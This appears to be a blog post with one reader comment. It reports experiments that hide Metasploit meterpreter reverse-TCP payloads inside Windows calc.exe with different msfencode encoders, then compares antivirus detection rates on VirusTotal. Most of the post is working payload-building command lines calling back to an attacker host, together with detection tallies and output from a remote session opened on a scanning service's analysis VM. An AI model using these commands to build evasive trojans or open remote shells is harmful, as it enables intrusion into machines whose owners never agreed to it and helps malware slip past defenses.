I really wanted to see what was inside the analysis folder and have some better statistic results from the antivirus. At that time, metasploit integrated a patch from ( http://www.metasploit.com/redmine/issues/1244 ), so i gave it a try also.
Detection rates and examples follow below, all result rates are from virustotal:
( calc.exe is calculator from windows XP and -k is the new command on msfencode to bind two files together and execute both of them in a separate thread )
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 5 -e x86/call4_dword_xor -x calc.exe -k -t exe -o testcalc-new1.exe
Result: 14/42 (33.34%)
Immediately when i uploaded the file i got a connection in my multi/handler,
[*] Meterpreter session 2 opened (hostA:4444 -> xx.xx.xx.131:49874)
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 118784 fil Wed Mar 24 11:52:27 +0200 2010 58568023.exe
100777/rwxrwxrwx 0 fil Wed Jan 14 05:59:52 +0200 2009 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil Wed Jan 14 05:59:52 +0200 2009 CONFIG.SYS
40777/rwxrwxrwx 0 dir Thu Jan 15 08:30:08 +0200 2009 Documents and Settings
100444/r--r--r-- 0 fil Wed Jan 14 05:59:52 +0200 2009 IO.SYS
100444/r--r--r-- 0 fil Wed Jan 14 05:59:52 +0200 2009 MSDOS.SYS
100555/r-xr-xr-x 47564 fil Tue Feb 28 15:00:00 +0200 2006 NTDETECT.COM
40555/r-xr-xr-x 0 dir Thu Jan 15 09:00:53 +0200 2009 Program Files
40777/rwxrwxrwx 0 dir Wed Jan 14 06:26:09 +0200 2009 System Volume Information
40777/rwxrwxrwx 0 dir Thu Jan 15 10:29:19 +0200 2009 WINDOWS
100666/rw-rw-rw- 211 fil Wed Jan 14 05:40:14 +0200 2009 boot.ini
100666/rw-rw-rw- 267964416 fil Wed Mar 24 12:50:57 +0200 2010 hiberfil.sys
100444/r--r--r-- 250048 fil Wed Jan 14 16:59:55 +0200 2009 ntldr
100666/rw-rw-rw- 402653184 fil Wed Mar 24 12:50:57 +0200 2010 pagefile.sys
100777/rwxrwxrwx 469 fil Wed Mar 24 11:52:19 +0200 2010 start.bat
100777/rwxrwxrwx 332800 fil Wed Jun 11 08:09:08 +0300 2008 wget.exe
Too bad i didn't see the analysis folder that i was looking. The connection was dropped 2-3 seconds later i assume the whole connection is lasting 10 seconds and the VM machine from what it appears it's rebooted or disconnected.
Trying again,
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 5 -e x86/call4_dword_xor -x calc.exe -t exe -o testcalc-new.exe
Result: 8/42 (19.05%)
Same template, but without binding of the exe files it was not bad actually.
With different encoder,
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 5 -x calc.exe -t exe -o testcalc-newnaiNObind5.exe
Result: 6/42 (14.29%)
Adding binding,
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 5 -x calc.exe -k -t exe -o testcalc-newnai.exe
Shikata ga nai the default encoder, gave a result of Result: 12/42 (28.58%).
I got almost the same results increasing the encoding times to 15
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw | ./msfencode -b '' -c 15 -x calc.exe -k -t exe -o testcalc-newnai15.exe
Result: 13/42 (30.96%)
And last one using XOR encoder
./msfpayload windows/meterpreter/reverse_tcp LHOST=hostA raw |./msfencode -c 20 -e x86/call4_dword_xor -x calc.exe -t exe -o testcalc-xor20.exe
Result: 8/42 (19.05%)
Plain encoding of the payload gives a detection rate of 20/42 (47.62%) (Shikata ga nai)
From what i noticed binding the exe file raises the changes of detection, most of the times the antivirus that are detecting the executables are the same, Microsoft, Nod32, Symantec, Sophos and something called McAfee-GW-Edition that is detecting anything as virus even plain text and incomplete code.
I really didn't wanted to put metasploit code into virustotal but i haven't seen any actual tests and results anywhere. I did some tests on novirusthanks ( http://scanner.novirusthanks.org/) but the scanner is slow, the results are poor and there are half, 20 only, antivirus engines on the scanner.
That's all for now, i didn't manage to get the files that i wanted, i manage to get some results on detection and some information from the VM's that were connecting back every time that i was uploading a file. Files are available on request.
Yeah, from my comment over on my blog, the primary thing being pegged is the default template.exe that's used to host a given payload. A couple of AV providers (Microsoft, primarily) have identified a way to locate any executable with a payload sliced in, but they are still in the minority.
ReplyDelete